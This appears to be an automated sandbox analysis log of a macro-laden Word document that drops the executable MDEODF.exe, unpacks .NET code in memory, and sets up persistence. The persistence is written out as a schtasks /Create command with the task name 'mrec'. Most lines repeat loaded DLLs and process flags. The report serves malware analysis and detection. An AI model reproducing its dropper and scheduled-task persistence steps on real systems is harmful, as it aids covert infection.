Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: yIla7SeJ6r.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\yIla7SeJ6r.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.MDEODF.exe.201a318.4.raw.unpack, DllHandler.cs	.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: 4.2.MDEODF.exe.201a318.4.raw.unpack, DllHandler.cs	.Net Code: DllNodeHandler
Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, DllHandler.cs	.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, DllHandler.cs	.Net Code: DllNodeHandler

Document contains an embedded VBA with many randomly named variables

Source: yIla7SeJ6r.doc	Stream path 'Macros/VBA/ThisDocument' : High entropy of concatenated variable names
Source: ~WRD0000.tmp.0.dr	Stream path 'Macros/VBA/ThisDocument' : High entropy of concatenated variable names

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EE330 pushfd ; retf 0054h	4_2_002EE331
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00309D40 push 8C003E6Ah; iretd	6_2_00309D45
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00306BC0 pushad ; ret	6_2_00306BC9
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030E330 pushfd ; retf 0033h	8_2_0030E331
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DE330 pushfd ; retf 002Fh	17_2_001DE331

Source: brtyhdrh[1].exe.0.dr	Static PE information: section name: .text entropy: 7.804219611352002
Source: MDEODF.exe.0.dr	Static PE information: section name: .text entropy: 7.804219611352002
Source: MDEODF.exe.5.dr	Static PE information: section name: .text entropy: 7.804219611352002

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	File created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
